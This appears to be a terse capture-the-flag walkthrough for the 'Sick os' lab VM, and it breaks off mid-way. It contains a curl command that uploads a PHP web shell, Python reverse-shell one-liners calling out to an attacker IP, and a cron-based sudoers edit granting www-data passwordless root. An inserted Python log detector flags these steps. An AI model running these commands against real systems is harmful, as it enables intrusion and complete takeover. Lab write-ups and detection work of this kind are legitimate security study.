Sick os

karthik prabhu
3 min read · Jun 14, 2022

Nmap

https://stackoverflow.com/questions/9120760/curl-simple-file-upload-417-expectation-failed

Reverse shell:

curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://192.168.1.7/test/shell.php

Wfuzz:

wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 -u 192.168.1.7/FUZZ

One way to get from the browser to a terminal reverse shell:

http://192.168.1.7/test/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.6%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
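Seen from the web server's side, the steps above leave a recognisable trail: a successful PUT that creates a script file, followed by requests to that same file carrying commands in the query string. The detector below is an added example, not part of the original write-up; the combined log format, the sample log lines, and the name find_uploaded_script_use are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not taken from the original post.
SAMPLE_LOG = """\
192.168.1.6 - - [14/Jun/2022:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 163 "-" "Mozilla/5.0"
192.168.1.6 - - [14/Jun/2022:10:01:02 +0000] "PUT /test/shell.php HTTP/1.1" 201 0 "-" "curl/7.81.0"
192.168.1.6 - - [14/Jun/2022:10:01:40 +0000] "GET /test/shell.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
192.168.1.6 - - [14/Jun/2022:10:02:10 +0000] "GET /test/shell.php?cmd=python%20-c%20%27import%20socket%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.9 - - [14/Jun/2022:10:03:00 +0000] "PUT /test/notes.txt HTTP/1.1" 201 0 "-" "curl/7.81.0"
"""

# client, timestamp, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = (".php", ".phtml", ".php5", ".cgi", ".pl", ".py")
# Strings that rarely belong in a query value but are typical of command execution.
SHELL_HINTS = re.compile(
    r"/bin/(ba)?sh|python\s+-c|import\s+socket|\b(id|whoami|uname|wget|curl|nc)\b")


def find_uploaded_script_use(log_text):
    """Return alerts for script files created via PUT and then requested."""
    uploaded = {}  # path -> client that uploaded it
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, ts, method, target, status = m.groups()
        parts = urlsplit(target)
        path = parts.path
        if method == "PUT" and status.startswith("2") and path.lower().endswith(SCRIPT_EXT):
            uploaded[path] = client
            alerts.append(("script-upload", ts, client, path, ""))
        elif path in uploaded:
            # parse_qsl percent-decodes values, so encoded payloads are inspected in clear.
            hits = [v for _, v in parse_qsl(parts.query) if SHELL_HINTS.search(v)]
            kind = "command-in-query" if hits else "uploaded-script-request"
            alerts.append((kind, ts, client, path, hits[0] if hits else ""))
    return alerts


if __name__ == "__main__":
    for alert in find_uploaded_script_use(SAMPLE_LOG):
        print(alert)
```

The PUT of notes.txt is not flagged because only script extensions are tracked; disabling PUT on the upload directory, or serving it without script execution, removes the first step entirely.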

Focus on

1. pwd

2. etc

3. tmp

Go and check tmp (nothing interesting)

So go back

Go and check etc

ls -la /etc/cron*

Used for job scheduling

Go to tmp

$ echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

$ cat update

chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers

$ ls -la

Move to root directory:
